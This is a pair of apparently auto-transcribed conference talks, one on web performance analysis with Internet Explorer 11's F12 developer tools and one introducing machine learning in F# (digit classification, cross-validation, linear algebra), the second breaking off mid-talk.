the CPU. And basically there are two tools, oops, there are two tools which kind of interrogate that information which comes out from that Windows system. One is the UI responsiveness tab on the F12 developer tools, which is at the top there. And the other is the Windows performance toolkit. And in the IE team, if you ever see any of the engineers doing performance debugging, they will use both one or either of these tools. They give slightly different results, they're intended for slightly different things. The F12 tools are the ones that we're going to look into. And I said earlier that the images are a real big problem in terms of using oversized images or using too many images. Well, this is two traces using that UI responsiveness tab, which we have done on a website called physicsafaster.io forward slash demos. It's called the right size image demo. And the top graph is a website which is taking all of the images and the images are much larger than their actual space and then they're resized by the browser. And this is quite a common technique now because of retina displays. People are just throwing up a very, very large image and then resizing it so it looks better on retina screens. But the problem you'll see is this kind of ton of blue in that top graph. And all of that blue, if I can zoom in, I don't know if I can. All of that blue you'll see on the thing here, on the key at the top, all that blue is image decoding. There's a ton of rendering, there's a ton of image decoding which is going on. 
And this green bar which runs across the bottom, that is visual throughput. So how often are you running at 60 frames per second? So a full green bar means you're running 60 frames per second and everywhere it dips, these little dips in the middle there and towards the end, all of the places where you're not managing to get to 60 frames per second. And so it basically means that the UI thread, if you're doing animations or anything like that and you haven't got 60 frames per second, it's going to potentially look a little bit jaggy or jumpy because you're not painting enough frames to the screen. So that image decoding, just by having oversized images is causing us problems here. And you'll see by using the right sized images on the bottom graph, we're saving nearly a third of the time. It's improved the speed of the website immensely just by using the right sized images because you're not making, and it's perceptually something you might not necessarily notice as a developer, but you've got to recognize that the browser is having to do a ton of work just to make those images the right size to display on the GPU. The other one is deferring script execution. This is, most people do this nowadays, but it's still, most people don't realize necessarily why they do it. Often people say, don't put script tags in the head of your document. And you can put them in the head of document, but just if you do, make sure that you mark them as async or put the script tags at the bottom of the document. And the reason why this improves performance so much is because every time the browser, any browser encounters JavaScript, by contract it has to execute the entirety of that JavaScript file. So it has to load it from wherever it is, bring it into the browser and then execute it because it could manipulate the DOM tree, it could manipulate the display tree. So you'll see on the first graph, there's this big chunk of white space where nothing's happening. And that's just loading the resource, loading the head, stopping the JavaScript file because that JavaScript file may contain something which edits the document. By putting it, that script file, that long loading script file at the bottom of the page, it will eventually load, but it isn't blocking our UI thread, it isn't blocking us from doing other stuff. So in this instance, I think there's an animation which is happening on the page. And the bottom trace is giving us whether those peaks are happening, that says doing our animation every sort of 16 milliseconds we're doing some kind of animation. And you'll note that the difference in speed is immense. So I'm able to get something happening, some animation happening on the screen on the bottom trace in 84 milliseconds, whereas on the top screen, it's happening in 438 milliseconds. So it's taking an awful lot of time, a lot longer. And the only change I'm making on that page is moving my scripts from my head to the bottom of my page. The other thing you often see a lot of people do is include too many frameworks. So you might have jQuery just to do selection when you could just maybe use document.getElement.id, or you might have Angular in there because you were going to use it but then you decided not to. Or you might have just modernize it but you don't actually do any feature detection. You often find that people will take boilerplate code, have tons and tons of JavaScript libraries in there, not necessarily use any of them, and then you get traces like this. And the top trace is just this C of orange. 
And that sea of orange is garbage collection. Because although you're not doing anything with those libraries that you've included in your web page, they're still creating objects, or they've created objects on the global namespace somewhere perhaps. And all that has to stay in memory somewhere. So if you've got lots of memory in use on the page and it's being used again and again, with different things loading all the time, then garbage collection has to kick in. And every time garbage collection kicks in, it's going to be interrupting your UI thread, it's going to be interrupting your CPU. So that sea of orange means, basically, if I was to look at this trace, it shows me that there's just far too much garbage collection going on. For some reason there are just far too many objects which need to be destroyed; we're getting to the upper limits of our memory. And for this demo, this example, the frameworks which are included don't actually do anything. They just initialize. And, you know, we've got these memory problems already. So reducing the number of frameworks can really help. This next one is quite a complicated one to explain: coalescing style and layout changes. So this is an example where on the left hand side you see a little menu. And that menu is being moved, at the moment, as I scroll. And that's not a particularly great way of doing it. And then this time, as I'm moving up and down, rather than being driven directly by the scroll event, it's updating the position at a specific frequency and then using CSS3 animations to move the object. Now, in the first instance, where we're tying an element to the scroll event and moving that object every time we scroll, that's a very high-frequency input. Every time you scroll — which could happen like every two or three milliseconds — you're basically saying to your display tree: what you had before is no good anymore, throw that away and create a new display tree. Throw that away and create a new display tree, because you're moving something on the document every, say, 10 milliseconds. But we're not actually drawing it to screen. So we're creating these display trees and we're not drawing them to screen, so it's all just wasted CPU cycles. So what you want to try and do is align the work that's going to be done and make sure that when we do work, it actually ends up being painted on the screen. So rather than using an event like the mouse wheel event, for example, for moving up and down, it would be better to use something like requestAnimationFrame, which is a JavaScript API which fires a callback every time we get this interrupt from the monitor. Every time we can paint to the monitor, requestAnimationFrame is going to fire and say: I can paint now, you should create the tree now, and then we can paint it. And the other thing we did there — because on its own you're not going to get a nice smooth animation — is that the requestAnimationFrame callback will fire, say, every 16 milliseconds, or whatever the refresh rate of the monitor is, and as it fires the element is going to be in lots of different positions, and we transition the object between them using CSS3 transitions.
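A minimal sketch of that pattern — the element id and the transition timing here are made up for illustration — looks something like this: the scroll handler only records the input, the style write happens once per frame inside requestAnimationFrame, and a CSS transition does the smoothing:

    // In CSS you'd pair this with something like:
    //   #side-menu { transition: transform 0.2s ease-out; }
    var menu = document.getElementById("side-menu");   // hypothetical element
    var latestScrollY = 0;
    var ticking = false;

    window.addEventListener("scroll", function () {
      latestScrollY = window.pageYOffset;   // cheap: just record the input
      if (!ticking) {
        ticking = true;
        requestAnimationFrame(update);      // do the real work once per paint
      }
    });

    function update() {
      ticking = false;
      // one style write per frame; the GPU-driven transition smooths it out
      menu.style.transform = "translateY(" + latestScrollY + "px)";
    }
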
And the other benefit of doing that is that we offload all that animation rather than doing it in JavaScript, we're putting it into a, we're putting it into the GPUs work. So if we look at the trace of the first element and then the second element, the first element we're doing work, we're doing two lots of work, but only if one of them in that is getting painted. So all of that, the blocks of two, only one of those elements in that block of two is actually getting painted. So I think it's, I can't see that, never mind. So what you want to try and do is correlate or coalesce your style and layout changes so that they happen at the same time. The other benefit of this, if we're using, and this is a general rule as well, animation with CSS animations is far better than animations with JavaScript because we can take the animation, we can put it on the GPU and let that do it and leave our CPU to run our website. So if we look at the first trace on, this isn't using the DevTools, it's using that Windows performance analyzer. And it shows the CPU usage, the GPU utilization. And you'll notice that in the JavaScript animation, we're using the UI thread and the HTML render thread. But when we're using the animation just in CSS, we're only using stuff which is related to the GPU and scheduling for the GPU. We're not doing or blocking the HTML thread at all. So it's really useful when you're doing this work, using request animation frame rather than sort of set time out or timers or scroll wheels and making sure that you have CSS animations which transition things over as well. Another one quickly is when you're building websites and you're using images, it's very easy to just use PNGs. I use fireworks for all of my graphics and I export as PNG just out of a matter of fact. I never really thought about it much before. But there's actually a memory penalty to using PNG over JPEGs. And obviously if you're using alpha transparencies, then you have to use PNGs. But in the most cases, for just a standard image, you should be using JPEGs. And again, that build website, we took the one website which had PNGs and one which had JPEGs, exactly the same dimensions these images, but they were just different image formats. And we used the memory tool. And the memory tool in the F12 tools allows you to take a snapshot of the memory stack of the memory heap and we can say how many objects, how many JavaScript objects are in that thing at that time. And then we can take a second snapshot and we can see how many objects are in it at that time. And we can see the delta if there's more objects being added or less objects that have been added. And we can keep taking snapshots after snapshots and then comparing them with different things. So we can have a look and see how memory usage has changed over time. So this tool is very useful for seeing memory leaks, for example. If something is constantly creating objects in memory, we will spot it using this memory tool by profiling. But here I'm using it just purely to say, okay, we took a snapshot using PNGs and we've got 8.6 megabytes of memory, decoded memory. And then if we just use JPEGs, exactly the same images, it looks exactly the same. We've now got half of that, that's 3.59 megabytes. So there's a massive amount of saving in memory that you get from using something like JPEG over PNG. It's important to remember that when you're thinking about an image, it's not necessarily the image on disk which you're calculating. 
So for example, you might have a 557kb disk image, but the memory usage of that image to keep that in memory is actually the width of the image roughly, the width of the image times by the height of the image times by 4. So that 557kb image is actually 2.67 megabytes when it's decoded. So you don't need many of those to start getting to quite a lot of images inside of memory. And people don't necessarily realize this, I don't think, when they're building their applications. So the way that we deal with when we're trying to display an image inside of Internet Explorer, a request goes out for that image and some of it's received, it's like a stream. And so we start decoding some of it. Then more of it's decoded and decoded. It gradually streams in and we start decoding. And then we process that code and then we copy the elements of the GPU. And then we finally paint it to screen. And so we can see over here on the CPU thread we've got various bits of work, the actual color coding from, I've just realized on there. But say the UI thread is meant to be pink in here, but it's meant to be blue. So that blue section is the UI thread and then the green section is the decoding. So it's doing some stuff on the UI thread, it's then doing some decoding work. There's the decoding work. And then we have this weird space where it's not doing anything on the CPU and it's not doing anything on the GPU and there's just blank space on both. And what's actually happening here is we're making a copy from the CPU to the GPU. So we're taking the image and we're copying the GPU. Now you might be thinking, well, on a modern laptop that's not really a problem because memory bus is really fast and you can do that really, really quickly. But on low-end mobile phones it can be like six megabytes per second. So we could theoretically get to a point where to copy that image, that 2.97 megabyte image on a low-end phone might take half a second to copy it from memory to the GPU. And you start realizing on low-powered mobile phones images and the heavy use of images can really make a browser on a mobile phone appallingly slow. And it's actually getting down to memory bus speeds, which is kind of mind-blowing really. No one ever really thinks about that when you're designing websites. But you start seeing this stuff in the Web Performance Analyzer. I won't go through any more of this to others to say in IE 11 we've added features to try and improve this slightly, try and improve performance of JPEGs, I think by about 40% ahead of what we had in IE 10, because we've actually realized that we can do a lot of the processing and decoding together on the GPU rather than in CPU. So the IE 10 model is where we do the processing separately, then we copy it to the GPU. We actually do a copy to the GPU, do the processing on the GPU for JPEG decoding. So JPEGs are genuinely, genuinely smaller in memory, but also in IE 11 specifically, we've also got 30%, 40% speed increases in terms of using JPEGs as well. So on IE specifically, there's a really good reason to use JPEGs as well. But I think the important thing when you're looking at these tools and creating websites and using these tools to kind of debug your websites, you start realizing that we're no longer just creating websites for these very high-powered machines. We're not just limited by bandwidth and network, it's a whole orchestra of all these different subsystems working together. 
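Coming back to that width times height times 4 rule for a second — a quick sanity check, using made-up dimensions rather than the image from the demo:

    // Decoded size of a bitmap is roughly width * height * 4 bytes (RGBA),
    // regardless of how small the JPEG or PNG is on disk.
    function decodedSizeMB(width, height) {
      return (width * height * 4) / (1024 * 1024);
    }

    console.log(decodedSizeMB(1024, 768).toFixed(2) + " MB");   // ~3.00 MB
    console.log(decodedSizeMB(1920, 1080).toFixed(2) + " MB");  // ~7.91 MB
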
It's very, very complicated, and we're trying to deliver these tools to give you insight and to enable you to kind of debug your websites, to get insight into how you can improve performance to your page as well. I think when you're developing websites, a lot of people think about designing first for mobile, but I think you should be thinking about performance optimization for mobile as well. Think about how much you're using in terms of memory. Just check on your website using the memory analyzer, how much memory you're using, what's your memory footprint. Because it might not sound too bad if you're using only 20 megs of memory, but lots of people have multiple tabs open on, even on mobile phones nowadays, you can have multiple tabs open in a browser. And if you're 20 meg in one tab and 20 in another, well, the browser, agile switching between those tabs is going to be switching that memory around. It's going to be saving it to disk, it's going to be bringing it back into memory, and you're going to be thrashing the hard drive. And it can be a case of actually reducing the lifespan of the hard drive or the storage on a phone just by thrashing it by moving stuff back and forth from memory and using poor memory management. So think about mobile first when you're designing websites and thinking about low-powered hardware and using these tools to try and get some insight into that. Up until very recently, that was a bit of a problem on something like Windows Phone because we didn't have any tools to give you that. You can now, if you've got Visual Studio and Windows 8.1 phone and IE 11 installed on the phone, you can use Visual Studio to debug websites on those phones as well. So you can either do this in the emulator or you can actually plug in a device and use that. But you go to the debug menu, other debug targets, and then debug Windows Phone into the Explorer. It will bring up a dialog box. And then all of the tools that I showed, kind of the memory, the DOM Explorer, all of those things will work as well on the browser on here. So it doesn't have to be your code, it could be any website, and you can sort of start interrogating your mobile phones as well. That's kind of it. It's a whistle-top-store, whistle-stop tour of the developer tools. And I hope that you kind of will look at those tools and see that we're trying to do some interesting things, not just to help you debug websites, but also improve performance. So if you are interested at all in looking at the tools in more detail, I'll be at the stand, the IE or the Windows stand, all the rest of today. And please come along with your websites and we can have a look at the performance of them. So thank you very much. Okay. If anyone's got any questions, I don't know if anyone's got any questions. We've got five minutes left. I have no idea. Let's try it. I don't know how it works on the Norwegian Coreboard Keyboard. We can try. But yeah, I hope there's a different key mapping, but I don't know. So there's a question. Browser mode. Yeah. You can change the IE version down to IE 7. IE 7. So the question is, have we brought back browser mode? Yes, you can emulate IE 7, IE 8, IE 9, IE 10, and IE 11 using the tools. Obviously some of the tools like the memory analyzer won't work when you're trying to debug in IE 7 emulation. But you can use that. So the question is, in conditional, do we support conditional comments? Yeah. I think conditional comments should now be included in the DevTools. 
Because we stopped supporting conditional comments in IE 10 to comply with the HTML5 rendering specification. But yeah, I think if you change the emulation mode, it will still take conditional comments into consideration. I'll check that, but I'm pretty sure it does. So the question is: you want to use these tools on your dev machine without running IE 11? To get these tools working, there's a whole lot of plumbing which requires IE 11, so these DevTools will only work in IE 11. You could try installing Visual Studio and see if the DevTools work through that — I don't know. But you need IE 11 to get these DevTools working. Any more? Thank you very much.
|
Building a high performance front end is a balancing act. You need to understand all the different moving parts and subsystems in the browser and how they interact with each other. Small changes can significantly impact page and app load time, memory consumption, and processor use, which has a huge impact on your user’s experience! In this session, we will dive into the subsystems of the browser and learn to optimise performance on sites and in web apps. We will also deep dive into the new performance analysis tools available in IE11 that expose good and bad run-time patterns for your sites and web apps, and help you provide users with a fast and fluid experience.
|
10.5446/50819 (DOI)
|
Hello, everybody. So I guess it's time to start. So I'll be talking about machine learning in F# today. Before starting, here are a few words about me. My name is Mathias Brandewinder. You can find me on Twitter as @brandewinder. Usually I'm the little character on the right — that's me on GitHub and places like that. That would be typically me. I'm French. I live in San Francisco. It's my first time in Oslo and I'm having a grand time — it's really awesome. A few things which might be relevant. Unlike probably most of you, I'm actually not a software engineer by training. I came to software engineering 10 years ago. My background is in economics and operations research. That's applied math, optimization, probability, all that type of stuff. And I came into .NET 10 years ago a bit by accident. At the time I was doing models and I was doing a whole lot of VBA, and more and more VBA. At some point I had to realize that this was probably not right. So I looked into other things, and I came across C#, and I started with C#. That was great. I still did models, forecasting, things like that. Four years ago, I read somewhere that you were supposed to learn a new language every year. I opened Visual Studio. There was a little box which was F#. I thought, hey, maybe let's give it a go. I started with it and I completely fell in love with the language. Since then, I do F# pretty much all the time, and C# when I have to. Something along these lines. Since then, I have been doing mostly forecasting and quantitative models using software. I discovered recently that apparently this has a name and it is called data science. Apparently I'm a data scientist. I looked for definitions and I came across a few. One of them is: a data scientist is a statistician who lives in San Francisco. That's correct. The other one is: a data scientist is a statistician who uses a Mac. So that's not correct. The third one, which I thought fits well and which I really like, is: a data scientist is a person who is better at statistics than any software engineer and better at software engineering than any statistician. I feel that's kind of what I'm doing. Data science is about having one foot in math, statistics and all of this, and the other one in code. Otherwise, I have a blog and all these things. Today we're going to talk a bit about machine learning and data science. I made a few assumptions about who you guys were. The first assumption I made is that everybody, or most of you, are probably familiar with OO languages — C#, Java, all of this. I'm assuming that most of you, or probably all of you, are unfamiliar with machine learning, because it's a software conference, not a machine learning conference. I'm assuming that some of you, probably not all of you, are familiar with F#, and that some of you, and probably not most of you, are familiar with functional programming. Is that a fair assumption so far? Cool. Okay. So I'm not completely off base. That's reassuring. So why did I want to do this talk? I live in San Francisco. This is probably a bit of a bias, but right now in San Francisco, the topics of machine learning and data science are red hot. Because I'm a data guy, I brought a piece of data on the right. This is a recent list of meetups. Pretty much every meetup on the topic is drawing somewhere between 100 and 300 people, and you have one of these every week. People are just going crazy over there. So I do realize that San Francisco is sometimes biased.
It's not necessarily what the rest of the world is doing, but I feel like there is a big trend there. The second thing I noticed is that if you go to machine learning talks or talk to machine learning people, usually they talk about lots of things, but they don't talk about .NET much. So coming from .NET, I felt like, for me, that's a bit of an issue, and I think they're probably also missing something with F#. The third one is on the other side of the house, the software side: I think lots of people in the software community don't realize that machine learning is not just for statisticians, it's also for software engineers. The reason it's not called statistics is that it has one foot in one and one foot in the other. And so I feel like it's important to actually tell you guys that it's a fun place to be, with very fun computer science problems, and so you should look into it right now. So my goal today — I'll start with what I can't do, and what I can't do is two things. There is no way I can introduce F# in one hour; that would just make no sense. The other thing I can't do, which is probably even worse, is introducing machine learning in one hour — I can't do that either. So I had to choose a bit how we'd approach the topic. What I want to do is, rather than trying to do everything poorly, I'm going to try to do a few things hopefully decently. And what I want is to give you a sense for what machine learning is. Given the fact that you're developers, I'm going to try to highlight some of the differences — how it is different from writing code as a software engineer — and give you a sense of what the day of a machine learning guy looks like. And the other piece is, obviously, I'm here because I want to talk about F#, and so I'm also going to have a second thread, which is going to try to explain why F# is actually a great fit for that type of activity and why you should pick it up. So, a quick introduction in case you haven't heard about F#, in about five bullet points. F# is a functional-first, statically typed language. Just like C# is object-first and a bit functional, F# is kind of the flip side of that. It's cross-platform: it runs on Windows, on Mac, on Linux, pretty much whatever you want. It's open source. There is actually someone in the room over there — there was a pull request last week which went into the compiler, so it really is open source. One way you could think about it is maybe something like Python with types. Another, mean, way to say this would be that it's Python which is actually performant and with fewer typing mistakes. And it's also a language with a fantastic community. And if you want to find us, it's on Twitter, hashtag #fsharp. So that was for the F# side; now for the machine learning one. I thought it would be useful to give a definition for this — it's a bit clearer than data science, actually, which is a bit of a buzzword. And when I need a definition I go to the source of truth, so I went of course to Wikipedia and I copy-pasted this one. The dry version is: a computer program is said to learn from experience E with respect to a task T and a performance measure P if its performance at T, as measured by P, improves with experience E. So that's a definition. It's probably not the most friendly definition, so I thought an English translation might help.
What you're really trying to do is this: you're writing a program, and the program is written to perform a task. To perform that task, it's going to consume data. And the part about performance really says that you're writing the program such that the more data it sees, the better it becomes at performing that specific task. It's probably easier put that way. It's rooted in statistics and in math, but it's also a computer science problem. For me, the reason it's called machine learning and not statistics is that statistics was rooted in the past, in the days when you had very little data and no computers — it was the dark ages, maybe you had floppy disks. Your problem back then was to squeeze information out of very little data. Machine learning is different, because that's not the problem we have today. Today the problem is that you probably have too much data, and old-school statistics doesn't quite work. You're trying to do the same thing as a statistician — use your data — but you also need to know a bit about computers to deal with it, because it's no longer a tiny file; it's a much bigger kind of thing. So, the plan. As I said, I'm going to run two threads, and I'll progress in four little sections. Each of them will carry a machine learning point: I'll try to teach you some ideas or concepts so that you come out with a sense of the landscape. In the first section, on the machine learning side, I'll talk about classification; later I'll talk about regression and about unsupervised machine learning. On the other side, at the same time, I'm going to show you how you can do fairly decent machine learning on .NET, and in F# in particular, because there are actually pretty good libraries. I'm going to talk a bit about algebra, because even though it's probably not your favourite topic, it's an important one, and for people who care about it, it's a big deal. I'm going to try to make the point that the functional style is a great style of coding for machine learning. And finally I'm going to talk about something which doesn't fit neatly in either category: type providers, because any sufficiently long discussion with F# people ends up at type providers. So that's what we'll do. Let's start with classification and regression. My goal in this section is to give you a sense of what a day of machine learning looks like, and to explain what classification and regression are — a bit of vocabulary and some conceptual ideas. With your data, there are two classes of problem you might want to tackle. In the first, you have data and you're trying to make a prediction, and the prediction uses the data to classify items: you're trying to say, is this red, is this black? A prototypical example is your inbox: your email system probably has a spam filter, and that's a classic classification problem — I'm receiving emails and I'm trying to say, is that email spam or is that email ham?
That's a classification problem. The one we're going to look at in a minute is character recognition: I'm trying to say, is this an A, is this a B, is this a C? These are discrete choices — I'm trying to say which bucket something falls into. By contrast, the second big class of problems is regression. In a regression problem you're not trying to decide whether something is in bucket A or bucket B; you're trying to predict a number. The prototypical example would be predicting the price of a car, or the cost of an apartment — a number which could be anything from zero to whatever. Both of these belong to one category of machine learning called supervised learning, by opposition to unsupervised learning, which we'll look at later. The idea of supervised learning is that I have data and I know exactly the question I'm trying to answer. In the case of my email, I know the problem I'm trying to solve: I want to know if it's ham or spam. If I want to recognize characters, I want to know if it's a one or a two or a three. It's supervised because I know the question, and I'm trying to push, or supervise, the model in the direction of the question I'm interested in. Does that make sense so far? Cool. Rather than talk more about classification, I'm going to work live with an example. I pulled it from Kaggle, a company in San Francisco that organizes machine learning competitions. For that matter, if you're interested in getting started, check out kaggle.com: they have free competitions, they have competitions where you can make a boatload of money, and it's extremely fun and a great way to get into the topic. The problem of the digit recognizer is simple. They took people and asked them to write numbers on a sheet of paper — one, zero, three, whatever — so that's the kind of data you have. And the problem is: if I give you a new image you have never seen, tell me, is this a five, is this a three? We're trying to build a classifier that recognizes handwritten digits. To do this we're going to use a classic algorithm — the details don't really matter, but it's a support vector machine, and specifically the Accord.NET implementation. One of the reasons I picked it is that Accord.NET is written entirely in C#; it's a pretty nice library with lots of things in it, and the neat part is that I can use it out of the box from F# with absolutely no problem — whatever you have in C#, you can use in F#. What the algorithm tries to do, if you picture classifying black versus white points — in our case the zeros, ones, twos, threes and so on — is to separate the groups by boundaries, or bands, that are as wide as possible. That way you don't just separate the data into groups; you're also fairly confident the separation is good, because the margin is wide. So now I'm going to show this in action, and I'm going to jump straight into Visual Studio.
I'm going to go to the part called classification — it's magnificently organized. My day as a machine learning guy will typically start with data, so your day is probably going to look a bit like this: show me my data. That's probably not what you're used to as a software engineer — here the prototypical problem starts with somebody saying, hey, here is a big chunk of data. In this case, these are the images I was talking about: about 5,000 images and something like 800 columns. This is obviously not fun to work with, but that's the kind of material you deal with on a daily basis, and my problem is to make a prediction out of it. So I'm going to jump into the scripting environment, F# Interactive, and load a few references — think of it as loading what I need; that part isn't very interesting. And now my day can begin. The first thing I need to do is load the data, so let's do that. This is where the data lives, and the file name — nothing super interesting. Then I write a small function to read the data (we'll see a much better way to do this a bit later): take the file path, read all lines, drop the header — keep everything from one to the end — then take every line and split it; the first item is the number I'm trying to predict, the rest are the pixels, and then I'm done. One thing I love about F# is this thing on the left, the pipelining: when your day is all about taking data and transforming it, a pipeline shows exactly what's happening — take data, transform, transform, transform, done. It's extremely readable; a small feature, but really neat. So I run it and read the data from my training set. Obviously this takes a bit of time — it's not big data; let's say more than tiny, but not big. It loaded, it took a moment, and I'm just noting that observation for later. And because nobody enjoys staring at arrays of numbers, I wrote a tiny visualizer: I take the first ten elements of the set and render them. This is the data we're dealing with: a three that's fairly recognizable, a five that's already less so — you can see that humans have written these. Some handwriting is pretty nice, and some looks more like your doctor writing a prescription. It's not a trivial problem; even as a human I sometimes look at an image and have no idea. This one, for instance, is a one — I would not necessarily have guessed it. So that's what we're trying to predict. Now, I've loaded the data, and it was a bit slow.
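For reference, the little reader described above might look roughly like this — a minimal sketch, where the file path and the exact column layout (label in the first column, 784 pixel values after it) are assumptions rather than the code from the talk:

```fsharp
open System.IO

// Read the CSV into (label, pixels) pairs: drop the header, split each line,
// take the first column as the digit and the rest as pixel values.
let readData (filePath: string) =
    File.ReadAllLines filePath
    |> Array.skip 1
    |> Array.map (fun line -> line.Split(','))
    |> Array.map (fun columns ->
        let label = int columns.[0]
        let pixels = columns.[1..] |> Array.map float
        label, pixels)

let training = readData @"C:\data\trainingsample.csv"
```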
So I'm simply going to use Accord.NET, and I'm going to set up the algorithm we'll use. The details aren't super important, but what you see at the end is: a learner, an algorithm, and a configuration being passed in. I'm telling the algorithm how I want it to learn from my data: I specify which algorithm I want, I use a kernel — a linear kernel; it doesn't really matter here what that is — I prepare the configuration, and now my learning routine is ready to go. The only thing left is to pass it data, which is the next thing I do: learner, run. Now it's working its magic, cranking on the data and trying to learn, so let's give it a second. At this point the algorithm is looking at 5,000 elements and trying to separate the ones from the twos from the threes, to produce something I can then hand new data to, and it will tell me: I think this is a one, I think this is a two, and so on. And it just runs — wonderful. On top of running, it also gives me an error, and this is where it gets interesting: the scripting environment tells me, hey, the error is zero percent. Hooray! My day is done, it's 100% correct, it's time to open a beer, let's go celebrate, right? And I would say: not so fast. It's really nice to go for a beer, but it's a bit too early. The reason is that what we really did here is give the algorithm a set of data and tell it: do the best you can to produce a model which fits this data and gives the right answers. That's great, but the problem you can run into is what's called overfitting: you get a model which is extremely good on one data set, and the thing you don't know is whether it will actually work on data it has never seen. And that's really what you want — the fact that the model does well on data you already know is kind of useless; you build a model because you want to predict things you have not seen before. In the olden days of statistics you would crank out the math on the blackboard and do lots of calculation, but today, given that we have more data, there's a much easier way to check how good your model is: take part of the data for the learning, create the model, keep the rest aside, run the model on it, and see whether it does any good. That gives you a pretty good answer, because you're feeding it data it has never seen, so it will behave much like real life — you can immediately see if it's good or bad and whether you need to rework things. That's called cross-validation, and it's what I'm going to do here.
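To recap the training step in code before we move on to validation, here is a rough sketch against the Accord.NET 2.x-era API used in this demo — the exact type and delegate names are from memory and may differ in the current library, and `trainingImages`/`trainingLabels` stand for the pixel arrays and labels pulled out of the training data:

```fsharp
open Accord.MachineLearning.VectorMachines
open Accord.MachineLearning.VectorMachines.Learning
open Accord.Statistics.Kernels

// 784 pixel inputs, 10 possible digits, linear kernel.
let svm = MulticlassSupportVectorMachine(28 * 28, Linear(), 10)
let learner = MulticlassSupportVectorLearning(svm, trainingImages, trainingLabels)

// Configuration: for each pairwise sub-problem, train with SMO.
learner.Algorithm <-
    SupportVectorMachineLearningConfigurationFunction(fun machine inputs outputs _ _ ->
        SequentialMinimalOptimization(machine, inputs, outputs)
        :> ISupportVectorMachineLearning)

// Run the learner; it reports the error on the training data itself.
let trainingError = learner.Run()
```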
So here I'm going to open my second data set, the validation sample, which is a similar kind of file. And now I'm going to take the classifier I just created and run it on that data. What I do is simple: I take my validation data, and for every element I look at the true answer — the label — and the image, and then I ask the classifier for its answer. If they're the same, that's a one; if they're not, it's a miss and that's a zero. If I average that out, I get the percentage of correctly classified images. Everybody with me? So let's do that — and again, I think the pipeline style is pretty neat; you can really read what's happening. And you can see my point: we get something which is still pretty good — instead of 100% on the training set, we now get about 90% correctly classified. Still decent, but not quite as beautiful as we initially thought. That's an important part of the machine learning process: you train on a training set, and you keep the rest of the data aside and validate on it.
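The scoring step itself is only a few lines; a sketch, where the file name is an assumption and `Compute` is the Accord.NET call that asks the trained machine for its prediction:

```fsharp
// Score the classifier on data it never saw during training.
let validation = readData @"C:\data\validationsample.csv"

let accuracy =
    validation
    |> Array.averageBy (fun (label, pixels) ->
        if svm.Compute(pixels) = label then 1.0 else 0.0)

printfn "Correctly classified: %.1f%%" (accuracy * 100.0)
```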
Now, because numbers are a bit dry — I told you it's 90% correct, but why would you believe me? — I'm going to use my visualization piece again and do the following: take ten random images from the data set, classify them, and see what happens; that will give you a sense of how good it is. This was a three, it told me three — pretty neat. This one is impressive, because I'm not sure I would have gotten it right: it was a one, and it said one. With this one I'm starting to be really impressed, because it's a really ugly eight and it got it right. That one was easy. That one was also pretty neat — it could have been a four. Wow, it even recognizes a six there. So I think it's neat: in about ten lines of code I got something which recognizes roughly 90% of the images; it took just a bit of work and it's working nicely. And that's largely what your day will look like: we have a model, it has a certain quality, and we have cross-validation with a training set and a validation set — a harness that tells us whether we're doing well or badly — so we can start working. The next step would be: can I go from 90% to 91%, maybe 92%? Can I squeeze a bit more out of the data? And this is where the scripting environment I jumped into makes a huge difference in my life in the context of machine learning. Imagine you were in C# and your project was a console app or whatever. Every time I decide to change my code, what do I have to do? Two things: recompile, and reload absolutely all my data. The recompile part is not that bad, but the data loading — this was a fairly tiny data set and it took a couple of seconds to load; with something more reasonable it's not unusual to spend two or three minutes loading the data. If I have to rebuild and reload every time I change something, my day is essentially going to be spent loading data and waiting for data to load. That's a terrible situation to be in. In the interactive environment, the REPL, this is beautiful, because I can keep going: I change my code and I don't need to reload the data — I load it in the morning while I get my coffee, I come back, it's there, and I can hack for the whole day. That's a big deal. In general, doing machine learning without a REPL is shooting yourself in the foot, and it's one of the big reasons I would take F# any day over C# for this type of work. That closes the part on classification — do you have questions? No questions for the moment, so I'll move to the second step. There will be fewer moving images — I'm sorry, I tried my best to make algebra sexy, but it resisted a bit. I still wanted to talk about algebra because it's an important area, and I'll try to show why in a second. If you take, for instance, the great machine learning class on Coursera, you'll see that pretty much every session is algebra, algebra, algebra. There are a few reasons for that, but if you do machine learning, chances are you're going to care about having good or bad linear algebra. What I want to show here is that, even without thinking about machine learning, F# has a few features which make it very pleasant to work with algebra. If I write something like let a = matrix [...], this is pretty much how the matrix would look if I opened a math book; it doesn't look complicated or weird, it looks exactly like the math. If I create a vector, same thing. And I can write things like c = b * a, which is also very close to how it would look to somebody coming from MATLAB or Octave. If you want to work in algebra, you want it to look like algebra, and F# gives you that — so F# is awesome again. That's the first point. The second point is a feature which, if you come from Python, you'll say "of course it has that": slicing, or array slicing. One operation you'll do very often is: here's my data set, I want to drop column seven, I want to manipulate it a bit. What I can do here, which is pretty neat, is say: out of this matrix, give me only columns one to two and only rows zero to one. That's extremely convenient — it's the type of thing you can't really do nicely in C#, and it makes a huge difference in writing clear code and knowing what you're doing, because when your code is not clear, that's when you start making mistakes. Again, Python people will say "of course, that's not really impressive" — but it depends where you're coming from.
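As an illustration — assuming the Math.NET Numerics library with its F# extensions, which provide `matrix` and `vector` builders like those shown in the demo — the algebra really does read like the math book:

```fsharp
open MathNet.Numerics.LinearAlgebra

let a = matrix [ [ 1.0; 2.0; 3.0 ]
                 [ 4.0; 5.0; 6.0 ] ]
let b = vector [ 1.0; 2.0; 3.0 ]

// Matrix-vector product, written the way the math book writes it.
let c = a * b

// Slicing: keep only rows 0..1 and columns 1..2 of the matrix.
let block = a.[0..1, 1..2]
```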
So that's why I think F# is a pretty good choice: if you want to do algebra, it's going to look like algebra. Now, there are a few reasons machine learning people care about algebra. The first — I can't quite go into the details of why — is that lots of optimization problems in machine learning can be expressed in an extremely compact way: instead of loops everywhere, you write a few matrix operations and your problem is stated and done. In this case, what I wanted to show was a bit of linear regression. Solving a linear regression — where I take inputs and try to predict the output as a linear combination of those inputs — turns out to be a one-liner in algebra using the normal form. If you open the math book or the statistics book, you'll find something like: X transpose times X, inverted, times X transpose times y. The details aren't that important, but that single line of algebra gives you exactly the solution to your regression problem, which is nice because it's very short. So let's do it. I'm going to create a completely artificial data set, because I didn't have a good one handy. Imagine I'm trying to predict the price of a car: I'll create 500 features — I probably couldn't come up with that many in real life, but imagine the age of the car, the number of cylinders, the mileage, all that stuff, 500 of them — so not big data yet, but serious data — and 5,000 observations, my cars. The real model will be a vector of 500 components; I make it a random vector, because I don't really care what the numbers are, and I create a random set of inputs as well. Then I create outputs which are a perfect fit: the output — the price of the car — is exactly the linear combination of the inputs, true beta times x, for every observation. So let's do this; if you 